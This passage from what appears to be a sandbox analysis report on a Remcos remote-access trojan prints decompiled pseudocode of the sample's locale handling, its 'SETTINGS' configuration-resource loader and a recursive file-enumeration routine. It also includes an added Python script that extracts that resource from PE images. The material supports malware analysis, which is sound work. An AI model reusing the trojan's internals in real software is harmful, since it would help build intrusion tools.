                                                                      							goto L21;
                                                                      						}
                                                                       						_t37 = 0x45b300;	/* second wide-string constant, checked only if the first did not match */
                                                                      						_t27 = _t23;
                                                                      						while(1) {
                                                                      							_t31 =  *_t27;
                                                                      							if(_t31 !=  *_t37) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t31 == 0) {
                                                                      								L17:
                                                                      								if(_t18 != 0) {
                                                                       									_t17 = E004383C2(_t23, _t23);	/* _t18 is nonzero only when _a4 matched neither constant */
                                                                      									goto L25;
                                                                      								}
                                                                       								_t8 = _a8 + 8; // 0xfde8fe81
                                                                       								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {	/* 0x2000000b = LOCALE_RETURN_NUMBER | LOCALE_IDEFAULTCODEPAGE (OEM code page) */
                                                                      									goto L22;
                                                                      								}
                                                                      								_t17 = _v8;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                      							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                                      								break;
                                                                      							}
                                                                      							_t27 = _t27 + 4;
                                                                      							_t37 = _t37 + 4;
                                                                      							if(_t32 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t18 = _t18 | 0x00000001;
                                                                      						goto L17;
                                                                      					}
                                                                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                      					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                      						break;
                                                                      					}
                                                                      					_t25 = _t25 + 4;
                                                                      					_t36 = _t36 + 4;
                                                                      					if(_t33 != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				asm("sbb edx, edx");
                                                                      				_t26 = _t25 | 0x00000001;
                                                                      				goto L9;
                                                                      			}


                                                                       (Per-line instruction address column for E0044E1AD, spanning 0x0044e1b2 to 0x0044e28f, omitted.)
                                                                      0x0044e1e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e1e9
                                                                      0x0044e1ec
                                                                      0x0044e1f2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044e1f2
                                                                      0x0044e1f8
                                                                      0x0044e1fa
                                                                      0x00000000

                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044E4CC,?,00000000), ref: 0044E246
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044E4CC,?,00000000), ref: 0044E26F
                                                                      • GetACP.KERNEL32(?,?,0044E4CC,?,00000000), ref: 0044E284
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: ef428767958845835335e45c7db6b177a5ddf4cf58c6bddbffebefdeaefd3fb9
                                                                      • Instruction ID: 0ac9d651d0f29da8eda36da026c118ff0bd0dcd63a7f79924f5161e0f5f6ae3e
                                                                      • Opcode Fuzzy Hash: ef428767958845835335e45c7db6b177a5ddf4cf58c6bddbffebefdeaefd3fb9
                                                                      • Instruction Fuzzy Hash: 88210632600100A6FB348F67C904BA7B3AAFF54B51B1681A6EC0AD7301EB76DD41C398
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                       			E00417CBB(void** __ecx) {
                                                                       				struct HRSRC__* _t1;
                                                                       				void* _t3;
                                                                       				long _t4;
                                                                       				void** _t5;
                                                                       				struct HRSRC__* _t7;
                                                                       
                                                                       				_t5 = __ecx;
                                                                       				// Locate the RT_RCDATA (0xa) resource named "SETTINGS" in the module whose handle is stored at 0x46dd20.
                                                                       				// Remcos keeps its configuration in this resource; this is the configuration the report's
                                                                       				// "C2 URLs / IPs found in malware configuration" signature refers to.
                                                                       				_t1 = FindResourceA( *0x46dd20, "SETTINGS", 0xa);
                                                                       				_t7 = _t1;
                                                                       				if(_t7 != 0) {
                                                                       					// Map the resource, hand the pointer back through the __ecx out-parameter and return its size
                                                                       					_t3 = LockResource(LoadResource( *0x46dd20, _t7));
                                                                       					_t4 = SizeofResource( *0x46dd20, _t7);
                                                                       					 *_t5 = _t3;
                                                                       					return _t4;
                                                                       				}
                                                                       				return _t1;	// NULL: no such resource, so the caller sees a zero size
                                                                       			}

                                                                       Instruction addresses (decompiler gutter for E00417CBB): 0x00417cca to 0x00417d01

                                                                      APIs
                                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00417CCC
                                                                      • LoadResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CE0
                                                                      • LockResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CE7
                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CF6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                      • String ID: SETTINGS
                                                                      • API String ID: 3473537107-594951305
                                                                      • Opcode ID: b4207ba667ef7437e4300c6b29b2f7a22674368dd85d1eaeb129335f37b46b66
                                                                      • Instruction ID: d7911c1fd8fc725af0a65da68648f77094c6b5a4a6c4ddc08b386f161bf9ece1
                                                                      • Opcode Fuzzy Hash: b4207ba667ef7437e4300c6b29b2f7a22674368dd85d1eaeb129335f37b46b66
                                                                      • Instruction Fuzzy Hash: 8BE01A36A00754ABD7212FA6AC4CD963F79F7D97973000035F60186321EA7588909E59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
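
                                                                       The function above is the sample's configuration loader: FindResourceA with type 0xa (RT_RCDATA) and name "SETTINGS", followed by LoadResource, LockResource and SizeofResource. The Python below is the analyst-side counterpart: it walks the PE resource directory of an image on disk (or of a dumped image) and returns the same blob. This is an added example, not code from the report or from the sample; `resource_section`, `find_named_rcdata` and the `build_rsrc` test builder are names chosen here, and the resource payload used in the test is constructed, not the sample's real configuration.

```python
"""Pull the RT_RCDATA resource "SETTINGS" out of a PE image: the analyst-side
counterpart of FindResourceA(h, "SETTINGS", 0xa) -> LoadResource -> LockResource
-> SizeofResource in the decompiled function above. Added example; names are ours."""
import struct

RT_RCDATA = 10  # the 0xa the sample passes as FindResourceA's lpType


def _entries(rsrc, dir_off):
    """Yield (name_or_id, offset) pairs of the IMAGE_RESOURCE_DIRECTORY at dir_off."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(n_named + n_id):
        yield struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)


def _dir_string(rsrc, off):
    """Decode an IMAGE_RESOURCE_DIR_STRING_U: u16 char count, then UTF-16LE chars."""
    (length,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2 : off + 2 + 2 * length].decode("utf-16-le")


def find_named_rcdata(rsrc, rsrc_rva, name="SETTINGS", rtype=RT_RCDATA):
    """Return the payload bytes of resource <rtype>/<name>, or None when it is absent
    (the FindResourceA == NULL branch above). rsrc is the raw resource table, rsrc_rva
    the RVA it is mapped at; data entries store RVAs, not offsets into the table."""
    for key, off in _entries(rsrc, 0):                             # level 1: type
        if key & 0x80000000 or key != rtype or not off & 0x80000000:
            continue
        for key2, off2 in _entries(rsrc, off & 0x7FFFFFFF):         # level 2: name
            if not key2 & 0x80000000 or not off2 & 0x80000000:
                continue
            # FindResource compares resource names case-insensitively
            if _dir_string(rsrc, key2 & 0x7FFFFFFF).upper() != name.upper():
                continue
            for _lang, off3 in _entries(rsrc, off2 & 0x7FFFFFFF):   # level 3: language
                # simplification: first language entry (FindResourceA prefers the thread locale)
                data_rva, size, _cp, _res = struct.unpack_from("<IIII", rsrc, off3 & 0x7FFFFFFF)
                start = data_rva - rsrc_rva
                return bytes(rsrc[start : start + size])           # LockResource ptr, SizeofResource len
    return None


def resource_section(pe, mapped=False):
    """Locate the resource table of a PE; returns (bytes from the table to the end of its
    section, table RVA). mapped=True is for an image dumped from memory, where file offsets
    already equal RVAs (the situation for the 0x400000 InstallUtil dump in this report)."""
    (pe_off,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[pe_off : pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    (n_sections,) = struct.unpack_from("<H", pe, pe_off + 6)
    (opt_size,) = struct.unpack_from("<H", pe, pe_off + 20)
    opt_off = pe_off + 24
    (magic,) = struct.unpack_from("<H", pe, opt_off)
    dd_off = opt_off + (96 if magic == 0x10B else 112)            # DataDirectory, PE32 vs PE32+
    rsrc_rva, _rsrc_size = struct.unpack_from("<II", pe, dd_off + 2 * 8)  # entry 2: resource table
    for i in range(n_sections):
        hdr = opt_off + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if va <= rsrc_rva < va + max(vsize, raw_size):
            if mapped:
                return pe[rsrc_rva : va + vsize], rsrc_rva
            return pe[raw_ptr + (rsrc_rva - va) : raw_ptr + raw_size], rsrc_rva
    raise ValueError("resource table RVA is not backed by any section")


def build_rsrc(payload, rsrc_rva=0x3000, name="SETTINGS", rtype=RT_RCDATA, lang=0x0409):
    """Construct a minimal resource table holding one resource (constructed test data, not
    the sample's configuration): root dir | type dir | name dir | name string | data entry | payload."""
    def directory(n_named, n_id):                                   # IMAGE_RESOURCE_DIRECTORY header
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    type_dir, name_dir, str_off = 24, 48, 72                        # each directory: 16 bytes + one 8-byte entry
    name_u = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    data_entry = str_off + len(name_u) + (-(str_off + len(name_u))) % 4  # keep the data entry 4-byte aligned
    out = bytearray()
    out += directory(0, 1) + struct.pack("<II", rtype, 0x80000000 | type_dir)
    out += directory(1, 0) + struct.pack("<II", 0x80000000 | str_off, 0x80000000 | name_dir)
    out += directory(0, 1) + struct.pack("<II", lang, data_entry)
    out += name_u + b"\0" * (data_entry - str_off - len(name_u))
    out += struct.pack("<IIII", rsrc_rva + data_entry + 16, len(payload), 0, 0)
    out += payload
    return bytes(out)


if __name__ == "__main__":
    import sys
    paths = [a for a in sys.argv[1:] if a != "--mapped"]
    with open(paths[0], "rb") as f:
        image = f.read()
    blob = find_named_rcdata(*resource_section(image, mapped="--mapped" in sys.argv))
    print("no SETTINGS resource" if blob is None else f"SETTINGS: {len(blob)} bytes")
```

                                                                       Run it against the unpacked Remcos image rather than the file submitted to the sandbox: the report's signatures (Costura assembly loader, .NET unpacker) mark kyFBQxVbsg.exe as a .NET loader, and the SETTINGS lookup above was recovered from the dumped InstallUtil image (00000011.00000002.645272430.0000000000400000...sdmp), so that dump is the input, with `--mapped` because a memory dump's offsets are RVAs. Remcos builds are known to keep this blob RC4-encrypted with the key stored ahead of the ciphertext; that decryption step is not shown by this report and is left out here.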

                                                                      C-Code - Quality: 93%
                                                                       			E00407ED2(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                       				// Recursive directory walk over "<directory>\*" using FindFirstFileW/FindNextFileW.
                                                                       				// __ecx is an object whose first byte is a stop flag and whose member at +4 receives a call
                                                                       				// per entry. _t100/_t113/_t128/_t170 are left unresolved by the decompiler (quality 93%).
                                                                       				void* __ebx;
                                                                       				void* __edi;
                                                                       				void* __esi;
                                                                       				intOrPtr* _t77;
                                                                       				intOrPtr* _t79;
                                                                       				signed int _t89;
                                                                       				signed int _t94;
                                                                       				intOrPtr* _t98;
                                                                       				void* _t115;
                                                                       				signed int _t123;
                                                                       				signed int _t125;
                                                                       				void* _t142;
                                                                       				signed int _t143;
                                                                       				intOrPtr _t146;
                                                                       				char* _t209;
                                                                       				void* _t213;
                                                                       				void* _t217;
                                                                       				void* _t219;
                                                                       				intOrPtr _t220;
                                                                       				void* _t221;
                                                                       				void* _t223;
                                                                       
                                                                       				_t146 = __ecx;
                                                                       				E00453798(E00453B7D, _t217);
                                                                       				_t220 = _t219 - 0x308;
                                                                       				_push(_t142);
                                                                       				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
                                                                       				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
                                                                       				E0040209F(_t142, _t217 - 0x5c);
                                                                       				_t77 = E004022C5(_t217 + 0x20, _t217 - 0x1c);
                                                                       				_t79 = E0040228A(_t217 + 0x20, _t217 - 0x20);
                                                                       				E00408448(_t217 - 0x28,  *((intOrPtr*)(E004022C5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
                                                                       				_t221 = _t220 + 0xc;
                                                                       				_t202 = _t217 + 8;
                                                                       				// Search pattern is <directory>\*; the WIN32_FIND_DATAW buffer (0x250 bytes) sits at ebp-0x30c
                                                                       				_t213 = FindFirstFileW(E00401EC4(E004078F9(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
                                                                       				 *(_t217 - 0x1c) = _t213;
                                                                       				E00401EC9();
                                                                       				if(_t213 != 0xffffffff) {
                                                                       					_t143 = 0;
                                                                       					__eflags = 0;
                                                                       					while(1) {
                                                                       						// The entry FindFirstFileW itself returned is never examined; processing starts with FindNextFileW
                                                                       						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
                                                                       						__eflags = _t89;
                                                                       						if(_t89 == 0) {
                                                                       							break;
                                                                       						}
                                                                       						// Stop flag at this+0 is re-read on every entry; when set, the search is closed and 0 is returned
                                                                       						_t209 =  *((intOrPtr*)(_t217 - 0x18));
                                                                       						__eflags =  *_t209;
                                                                       						if( *_t209 == 0) {
                                                                       							// dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10): recurse into subdirectories
                                                                       							__eflags =  *(_t217 - 0x30c) & 0x00000010;
                                                                       							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
                                                                       								// Skip "." and ".." (cFileName is at find_data+0x2c; the narrow "." is how the decompiler renders L".")
                                                                       								_t123 = E00438B0D(_t217 - 0x2e0, _t217 - 0x2e0, ".");
                                                                       								__eflags = _t123;
                                                                       								if(_t123 != 0) {
                                                                       									_t125 = E00438B0D(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
                                                                       									_pop(_t170);
                                                                       									__eflags = _t125;
                                                                       									if(__eflags != 0) {
                                                                       										// Build <directory>\<cFileName> and descend into it with the same object
                                                                       										_t202 = E004079C1(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040413E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
                                                                       										E00408472(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
                                                                       										E00401EC9();
                                                                       										E00401EC9();
                                                                       										_t223 = _t221 - 0x18;
                                                                       										E0040773A(_t143, _t223, _t128, __eflags, _t217 + 0x20);
                                                                       										_t221 = _t223 - 0x18;
                                                                       										E0040773A(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
                                                                       										E00407ED2(_t209, _t202, __eflags);
                                                                       										E00401EC9();
                                                                       									}
                                                                       								}
                                                                       							}
                                                                       							// Every entry, directory or not, is then matched by E004082CB; a result of -1 skips it
                                                                       							E0040413E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
                                                                       							_t98 = E004022C5(_t217 - 0x40, _t217 - 0x28);
                                                                       							_t215 = E0040228A(_t217 - 0x40, _t217 - 0x24);
                                                                       							E00408448(_t217 - 0x44,  *((intOrPtr*)(E004022C5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
                                                                       							_t221 = _t221 + 0xc;
                                                                       							__eflags = E004082CB(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
                                                                       							if(__eflags == 0) {
                                                                       								L15:
                                                                       								E00401EC9();
                                                                       								_t213 =  *(_t217 - 0x1c);
                                                                       								continue;
                                                                       							} else {
                                                                       								// Copy the whole WIN32_FIND_DATAW (0x250 bytes) and invoke the handler on this+4 with constant 0x66
                                                                       								E00401FA2(_t217 - 0x5c, _t202, _t215, E00402077(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
                                                                       								E00401F98();
                                                                       								 *(_t217 - 4) = _t143;
                                                                       								_t221 = _t221 - 0x18;
                                                                       								_t202 = E00402ED0(_t143, _t217 - 0x74, E00418445(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x46e260);
                                                                       								E00402ED0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
                                                                       								_push(0x66);
                                                                       								_t115 = E00404A78( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
                                                                       								__eflags = _t115 - 0xffffffff;
                                                                       								E00401F98();
                                                                       								E00401F98();
                                                                       								// A handler result of -1 ends the walk with 0; anything else moves on to the next entry
                                                                       								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
                                                                       								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
                                                                       									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
                                                                       									_t143 = 0;
                                                                       									__eflags = 0;
                                                                       									goto L15;
                                                                       								}
                                                                       								E00401EC9();
                                                                       								E00401F98();
                                                                       								E00401EC9();
                                                                       								E00401EC9();
                                                                       								_t94 = 0;
                                                                       								goto L17;
                                                                       							}
                                                                       						}
                                                                       						FindClose(_t213);
                                                                       						goto L6;
                                                                       					}
                                                                       					// Enumeration exhausted: close the search and return 1
                                                                       					FindClose(_t213);
                                                                       					E00401F98();
                                                                       					E00401EC9();
                                                                       					E00401EC9();
                                                                       					_t94 = 1;
                                                                       					goto L17;
                                                                       				} else {
                                                                       					// FindFirstFileW failed (INVALID_HANDLE_VALUE): also reported as 1
                                                                       					_t143 = 1;
                                                                       					L6:
                                                                       					E00401F98();
                                                                       					E00401EC9();
                                                                       					E00401EC9();
                                                                       					_t94 = _t143;
                                                                       					L17:
                                                                       					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
                                                                       					return _t94;
                                                                       				}
                                                                       			}

                                                                       Instruction addresses (decompiler gutter for E00407ED2): 0x00407ed2 to 0x004081b7

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00407ED7
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407F4F
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00407F78
                                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407F8F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                                      • String ID:
                                                                      • API String ID: 1157919129-0
                                                                      • Opcode ID: 2fe951166d1395251eba71003c0cdc166412e4604d5237fa9cfb8b2670ae89a3
                                                                      • Instruction ID: 8d8f50a9cfe8cc819608e56a08e892552cb0b09e6a4f2abad70f7dc2557b565b
                                                                      • Opcode Fuzzy Hash: 2fe951166d1395251eba71003c0cdc166412e4604d5237fa9cfb8b2670ae89a3
                                                                      • Instruction Fuzzy Hash: 4A8150728101199BCB15EBA1DD569ED7378AF14348F10427FF442B70E2EF386A4ACB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E0044E381(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				char _v20;
                                                                      				signed int* _v24;
                                                                      				short* _v28;
                                                                      				void* __ebp;
                                                                      				signed int _t39;
                                                                      				void* _t45;
                                                                      				signed int* _t46;
                                                                      				signed int _t47;
                                                                      				short* _t48;
                                                                      				int _t49;
                                                                      				short* _t56;
                                                                      				short* _t57;
                                                                      				short* _t58;
                                                                      				int _t66;
                                                                      				int _t68;
                                                                      				short* _t72;
                                                                      				intOrPtr _t75;
                                                                      				void* _t77;
                                                                      				short* _t78;
                                                                      				intOrPtr _t85;
                                                                      				short* _t89;
                                                                      				short* _t92;
                                                                      				void* _t94;
                                                                      				short** _t102;
                                                                      				short* _t103;
                                                                      				signed int _t105;
                                                                      				signed short _t108;
                                                                      				signed int _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_t39 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t39 ^ _t109;
                                                                      				_t89 = _a12;
                                                                      				_t105 = _a4;
                                                                      				_v28 = _a8;
                                                                      				_v24 = E00444255(_t89, __ecx, __edx) + 0x50;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t45 = E00444255(_t89, __ecx, __edx);
                                                                      				_t99 = 0;
                                                                      				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                                      				_t92 = _t105 + 0x80;
                                                                      				_t46 = _v24;
                                                                      				 *_t46 = _t105;
                                                                      				_t102 =  &(_t46[1]);
                                                                      				 *_t102 = _t92;
                                                                      				if(_t92 != 0 &&  *_t92 != 0) {
                                                                      					_t85 =  *0x45b2f4; // 0x17
                                                                      					E0044E324(0, 0x45b1e0, _t85 - 1, _t102);
                                                                      					_t46 = _v24;
                                                                      					_t110 = _t110 + 0xc;
                                                                      					_t99 = 0;
                                                                      				}
                                                                      				_v20 = _t99;
                                                                      				_t47 =  *_t46;
                                                                      				if(_t47 == 0 ||  *_t47 == _t99) {
                                                                      					_t48 =  *_t102;
                                                                      					__eflags = _t48;
                                                                      					if(_t48 == 0) {
                                                                      						L19:
                                                                      						_v20 = 0x104;
                                                                      						_t49 = GetUserDefaultLCID();
                                                                      						_v12 = _t49;
                                                                      						_v16 = _t49;
                                                                      						goto L20;
                                                                      					}
                                                                      					__eflags =  *_t48 - _t99;
                                                                      					if( *_t48 == _t99) {
                                                                      						goto L19;
                                                                      					}
                                                                      					E0044DCC1(_t92, _t99,  &_v20);
                                                                      					_pop(_t92);
                                                                      					goto L20;
                                                                      				} else {
                                                                      					_t72 =  *_t102;
                                                                      					if(_t72 == 0 ||  *_t72 == _t99) {
                                                                      						E0044DDA7(_t92, _t99,  &_v20);
                                                                      					} else {
                                                                      						E0044DD0C(_t92, _t99,  &_v20);
                                                                      					}
                                                                      					_pop(_t92);
                                                                      					if(_v20 != 0) {
                                                                      						_t103 = 0;
                                                                      						__eflags = 0;
                                                                      						goto L25;
                                                                      					} else {
                                                                      						_t75 =  *0x45b1dc; // 0x41
                                                                      						_t77 = E0044E324(_t99, 0x45aed0, _t75 - 1, _v24);
                                                                      						_t110 = _t110 + 0xc;
                                                                      						if(_t77 == 0) {
                                                                      							L20:
                                                                      							_t103 = 0;
                                                                      							__eflags = 0;
                                                                      							L21:
                                                                      							if(_v20 != 0) {
                                                                      								L25:
                                                                      								asm("sbb esi, esi");
                                                                      								_t108 = E0044E1AD(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                                                                      								_pop(_t94);
                                                                      								__eflags = _t108;
                                                                      								if(_t108 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								__eflags = _t108 - 0xfde8;
                                                                      								if(_t108 == 0xfde8) {
                                                                      									goto L22;
                                                                      								}
                                                                      								__eflags = _t108 - 0xfde9;
                                                                      								if(_t108 == 0xfde9) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                                                                      								__eflags = _t56;
                                                                      								if(_t56 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t57 = IsValidLocale(_v16, 1);
                                                                      								__eflags = _t57;
                                                                      								if(_t57 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t58 = _v28;
                                                                      								__eflags = _t58;
                                                                      								if(__eflags != 0) {
                                                                      									 *_t58 = _t108;
                                                                      								}
                                                                      								E00444B89(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                                                                      								__eflags = _t89;
                                                                      								if(__eflags == 0) {
                                                                      									L36:
                                                                      									L23:
                                                                      									return E004318FB(_v8 ^ _t109);
                                                                      								}
                                                                      								_t33 =  &(_t89[0x90]); // 0x440c4c
                                                                      								E00444B89(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
                                                                      								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                                                                      								__eflags = _t66;
                                                                      								if(_t66 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t36 =  &(_t89[0x40]); // 0x440bac
                                                                      								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                                                                      								__eflags = _t68;
                                                                      								if(_t68 == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t38 =  &(_t89[0x80]); // 0x440c2c
                                                                      								E0043DE3F(_t38, _t108, _t38, 0x10, 0xa);
                                                                      								goto L36;
                                                                      							}
                                                                      							L22:
                                                                      							goto L23;
                                                                      						}
                                                                      						_t78 =  *_t102;
                                                                      						_t103 = 0;
                                                                      						if(_t78 == 0 ||  *_t78 == 0) {
                                                                      							E0044DDA7(_t92, _t99,  &_v20);
                                                                      						} else {
                                                                      							E0044DD0C(_t92, _t99,  &_v20);
                                                                      						}
                                                                      						_pop(_t92);
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044E48D
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0044E4E8
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0044E4F7
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,00440B2C,00000040,?,00440C4C,00000055,00000000,?,?,00000055,00000000), ref: 0044E53F
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00440BAC,00000040), ref: 0044E55E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                      • String ID:
                                                                      • API String ID: 745075371-0
                                                                      • Opcode ID: df80448adb6dbcc8d83525514c000966fc8ab7e0377c049d259ea1cf243f73a2
                                                                      • Instruction ID: 39a8a5c125e4cbe99755be7ac3cee64471f244ed62b870d2846c08b958f2e924
                                                                      • Opcode Fuzzy Hash: df80448adb6dbcc8d83525514c000966fc8ab7e0377c049d259ea1cf243f73a2
                                                                      • Instruction Fuzzy Hash: 8451BE71A00219AAFF10DFA6DC45ABF77B8FF44311F04456AF910EB291E77899408B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00406EEF(void* __ecx, void* __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* _t62;
                                                                      				void* _t78;
                                                                      				void* _t88;
                                                                      				void* _t89;
                                                                      				void* _t97;
                                                                      				void* _t99;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				void* _t118;
                                                                      				void* _t120;
                                                                      				void* _t167;
                                                                      				void* _t169;
                                                                      				void* _t170;
                                                                      				void* _t172;
                                                                      				void* _t174;
                                                                      				intOrPtr _t175;
                                                                      				void* _t176;
                                                                      				void* _t177;
                                                                      				void* _t179;
                                                                      				void* _t180;
                                                                      				void* _t181;
                                                                      				void* _t182;
                                                                      				void* _t183;
                                                                      				void* _t184;
                                                                      				void* _t185;
                                                                      
                                                                      				_t165 = __edx;
                                                                      				_t120 = __ecx;
                                                                      				E00453798(E00453B69, _t172);
                                                                      				_t175 = _t174 - 0x2b0;
                                                                      				_push(_t169);
                                                                      				_push(_t167);
                                                                      				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
                                                                      				_t118 = _t120;
                                                                      				E0040209F(_t118, _t172 - 0x4c);
                                                                      				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
                                                                      				if(_t118 != 0) {
                                                                      					_t165 = 0x4610ec;
                                                                      					_t111 = E00407A23(0x4610ec);
                                                                      					_t188 = _t111;
                                                                      					if(_t111 != 0) {
                                                                      						_t185 = _t175 - 0x18;
                                                                      						E0040773A(_t118, _t185, 0x4610ec, _t188, _t172 + 8);
